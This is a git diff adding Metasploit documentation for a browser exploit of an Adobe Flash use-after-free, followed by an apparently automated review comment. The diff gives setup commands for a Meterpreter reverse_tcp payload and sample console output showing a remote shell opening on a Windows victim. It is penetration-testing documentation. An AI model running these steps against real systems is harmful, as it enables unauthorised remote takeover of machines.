diff --git a/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md b/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md new file mode 100755 index 0000000000..ac392d61ae --- /dev/null +++ b/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md 
@@ -0,0 +1,65 @@ +## Description + +This module exploits an use after free on Adobe Flash Player. The vulnerability, discovered by Hacking Team and made public as part of the July 2015 data leak, was described as an Use After Free while handling ByteArray objects. This module has been tested successfully on: + +1. Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194. +2. Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194. +3. Windows 8.1 (32-bit), IE11 and Adobe Flash 18.0.0.194. +4. Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194. +5. Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468. + +## Verification Steps + +1. Do: ```use exploit/multi/browser/adobe_flash_hacking_team_uaf``` +2. Do: ```set payload windows/meterpreter/reverse_tcp``` +2. Do: ```set LHOST [IP]``` +3. Do: ```set SRVHOST [IP]``` +3. Do: ```set URIPATH / [PATH]``` +4. Do: ```run``` + +## Sample Output + +### IE 11 and Flash 18.0.0.194 + +``` +msf > use exploit/multi/browser/adobe_flash_hacking_team_uaf +msf exploit(adobe_flash_hacking_team_uaf) > set PAYLOAD windows/meterpreter/reverse_tcp +PAYLOAD => windows/meterpreter/reverse_tcp +msf exploit(adobe_flash_hacking_team_uaf) > set LHOST 172.16.178.160 +LHOST => 172.16.178.160 +msf exploit(adobe_flash_hacking_team_uaf) > set srvhost 172.16.178.80 +srvhost => 172.16.178.80 +msf exploit(adobe_flash_hacking_team_uaf) > set SRVPORT 80 +SRVPORT => 80 +msf exploit(adobe_flash_hacking_team_uaf) > set URIPATH / +URIPATH => / +msf exploit(adobe_flash_hacking_team_uaf) > exploit +[*] Exploit running as background job. + +[*] Started reverse TCP handler on 172.16.178.160:4444 +[*] Using URL: http://0.0.0.0:80/ +msf exploit(adobe_flash_hacking_team_uaf) > [*] Local IP: http://127.0.0.1:80/ +[*] Server started. + +msf exploit(adobe_flash_hacking_team_uaf) > +[*] 172.16.178.80 adobe_flash_hacking_team_uaf - Gathering target information. +[*] 172.16.178.80 adobe_flash_hacking_team_uaf - Sending HTML response. 
+[*] 172.16.178.80 adobe_flash_hacking_team_uaf - Request: /rGaaQS/ +[*] 172.16.178.80 adobe_flash_hacking_team_uaf - Sending HTML... +[*] 172.16.178.80 adobe_flash_hacking_team_uaf - Request: /rGaaQS/AsvCG.swf +[*] 172.16.178.80 adobe_flash_hacking_team_uaf - Sending SWF... +[*] Sending stage (957999 bytes) to 172.16.178.80 +[*] Meterpreter session 1 opened (172.16.178.160:4444 -> 172.16.178.80:49167) at 2017-03-26 22:51:29 +0900 + +msf exploit(adobe_flash_hacking_team_uaf) > sessions -i 1 +[*] Starting interaction with 1... + +meterpreter > sysinfo +Computer : WIN7X64TJ7XH-PC +OS : Windows 7 (Build 7601, Service Pack 1). +Architecture : x64 (Current Process is WOW64) +System Language : en_US +Domain : WORKGROUP +Logged On Users : 2 +Meterpreter : x86/win32 +```
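Review bot: The Verification Steps list in the new file is numbered 1, 2, 2, 3, 3, 4, and its `set URIPATH / [PATH]` step does not say whether `/` or a custom path is meant; renumber the steps 1 through 6 and write that step as `set URIPATH [PATH]`, noting that the sample run uses `/`. The steps also stop at `run` without saying that a browser from the tested list has to request the served URL or what a successful check looks like (the sample shows `Meterpreter session 1 opened`), and they omit `set SRVPORT 80`, which the sample output sets. The tested list under Description gives Windows 7 SP1 (32-bit), yet the sample `sysinfo` reports `Architecture : x64 (Current Process is WOW64)`, so either add the 64-bit host to the list or state which listed configuration the sample was captured on; item 4 of that list also has no Firefox version. Smaller points: "an use after free" and "an Use After Free" should read "a use-after-free", and the file is added with mode 100755 although a Markdown document does not need the executable bit.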